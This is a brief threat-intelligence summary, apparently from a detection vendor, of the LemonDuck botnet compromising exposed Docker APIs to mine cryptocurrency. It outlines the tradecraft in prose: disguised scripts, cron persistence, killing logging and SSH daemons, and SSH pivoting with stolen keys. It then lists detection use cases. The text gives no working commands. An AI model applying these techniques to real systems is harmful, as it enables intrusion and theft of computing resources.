Docker Targeted by LemonDuck

Industry: N/A | Level: Tactical | Source: CrowdStrike

Intelligence from CrowdStrike tracked operations from cryptomining botnet, LemonDuck targeting Docker. A unique aspect of the campaign has identified the usage of proxy pools to enable the attackers to hide the wallet address, "Proxy pools help in hiding the actual crypto wallet address where the contributions are made by current mining activity." LemonDuck's initially gained access by compromising exposed Docker APIs. Once infiltrated, a custom Docker ENTRYPOINT is used to set executables that will always run when the container is initiated, in order to download a bash script that masquerades as a PNG file. The script sets a cronjob and downloads an additional bash file disguised as "a.asp," which is the true payload in the attack. Prior to initiating the mining operation, the script terminates processes, network communication, and/or indicators that could be rival cryptominers as well as terminating daemons for crond, sshd and syslog. LemonDuck operators are also capable of disabling Alibaba's cloud monitoring service. The mining setup operation completes with the download of XMRig. Lateral movement activity with LemonDuck is observed through SSH, from locating SSH keys, attackers log into servers and continue to deploy scripts.

• Anvilogic Scenario: LemonDuck Cryptomining Campaign with initial Bash Script
• Anvilogic Use Cases:
• Publicly exposed Docker API
• Rare shell script execution
• Crontab Job Scheduling (Unix)
• File Download (Unix)
• Locate Credentials
• Service Stop Commands
• SSH Pivoting
• Multiple SSH Logins Across Different Machines